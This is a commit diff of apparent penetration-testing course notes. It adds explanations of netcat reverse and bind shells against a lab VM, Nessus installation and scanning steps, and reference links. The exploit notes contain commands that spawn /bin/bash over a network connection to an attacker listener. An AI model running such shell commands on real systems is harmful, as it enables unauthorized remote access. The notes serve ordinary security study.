va

syselement · Jul 11, 2024 · 308ac94 · 308ac94
1 parent 9460c9a
commit 308ac94
Show file tree

Hide file tree

Showing 9 changed files with 80 additions and 4 deletions.
diff --git a/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-40-27_596.png b/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-40-27_596.png
diff --git a/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-41-43_597.png b/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-41-43_597.png
diff --git a/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-44-16_599.png b/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-44-16_599.png
diff --git a/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-44-48_600.png b/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-44-48_600.png
diff --git a/peh/3-eth-hack/.gitbook/assets/Netcat-bind-shell.jpg b/peh/3-eth-hack/.gitbook/assets/Netcat-bind-shell.jpg
diff --git a/peh/3-eth-hack/.gitbook/assets/Netcat-reverse-shell.jpg b/peh/3-eth-hack/.gitbook/assets/Netcat-reverse-shell.jpg
diff --git a/peh/3-eth-hack/exploit.md b/peh/3-eth-hack/exploit.md
@@ -1 +1,45 @@
-# Exploitation Basics
+# Exploitation Basics
+
+## Reverse shell vs Bind shell
+
+➡️ [netcat](https://netcat.sourceforge.net/)
+
+**Reverse shell** - the victim/target connects back to the attacker
+
+- Attack machine - **listening** on a port
+- Target machine - connect to the attacker machine listening port
+
+![Netcat Reverse Shell - hackingtutorials.org](.gitbook/assets/Netcat-reverse-shell.jpg)
+
+```bash
+# Attacker
+nc -nvlp 4444
+
+# Target
+nc 192.168.31.131 4444 -e /bin/bash
+```
+
+![Reverse shell](.gitbook/assets/2024-07-11_20-40-27_596.png)
+
+**Bind shell** - the attacker opens a port on the target (via exploitation) and connects to it
+
+- Attack machine - exploits target and opens port listening on target and connects to it
+- Target machine - listens for the attacker connection
+
+![Netcat Bind Shell - hackingtutorials.org](.gitbook/assets/Netcat-bind-shell.jpg)
+
+- Specially used on external assessment
+
+```bash
+# Target
+nc -nvlp 4444 -e /bin/bash
+
+# Attacker
+nc 192.168.31.131 4444
+```
+
+![Bind shell](.gitbook/assets/2024-07-11_20-41-43_597.png)
+
+---
+
+## Staged vs Non-Staged payloads
diff --git a/peh/3-eth-hack/va.md b/peh/3-eth-hack/va.md
@@ -1 +1,31 @@
-# Vulnerability Scanning with Nessus
+# Vulnerability Scanning with Nessus
+
+## Nessus
+
+➡️ [Nessus](https://www.tenable.com/products/nessus/nessus-essentials)
+
+- [Download Nessus](https://www.tenable.com/downloads/nessus)
+
+```bash
+curl --request GET --url 'https://www.tenable.com/downloads/api/v2/pages/nessus/files/Nessus-10.7.4-ubuntu1404_amd64.deb' --output 'Nessus-10.7.4-ubuntu1404_amd64.deb'
+
+sudo dpkg -i Nessus-10.7.4-ubuntu1404_amd64.deb
+
+sudo systemctl start nessusd.service
+```
+
+- Open the browser and go to [https://localhost:8834](https://localhost:8834)
+  - Follow my guide here to configure Nessus - [Nessus Essentials - syselement](https://blog.syselement.com/home/operating-systems/linux/tools/nessus)
+
+- Set a new scan with
+  - Kioptrix VM IP - `192.168.31.130`
+  - Discovery - `Port scan (all ports)`
+  - Assessment - `Scan for known web vulnerabilities`
+  - Advanced settings if necessary
+
+![](.gitbook/assets/2024-07-11_20-44-16_599.png)
+
+![](.gitbook/assets/2024-07-11_20-44-48_600.png)
+
+---
+
diff --git a/peh/peh-references.md b/peh/peh-references.md
@@ -106,11 +106,13 @@
 
 ### Vulnerability Scanning with Nessus
 
-
+- [Nessus](https://www.tenable.com/products/nessus/nessus-essentials)
+- [Nessus Essentials - syselement](https://blog.syselement.com/home/operating-systems/linux/tools/nessus)
 
 ### Exploitation Basics
 
-
+- [Hacking with Netcat part 2: Bind and reverse shells](https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/)
+- [netcat](https://netcat.sourceforge.net/)
 
 ## Buffer Overflows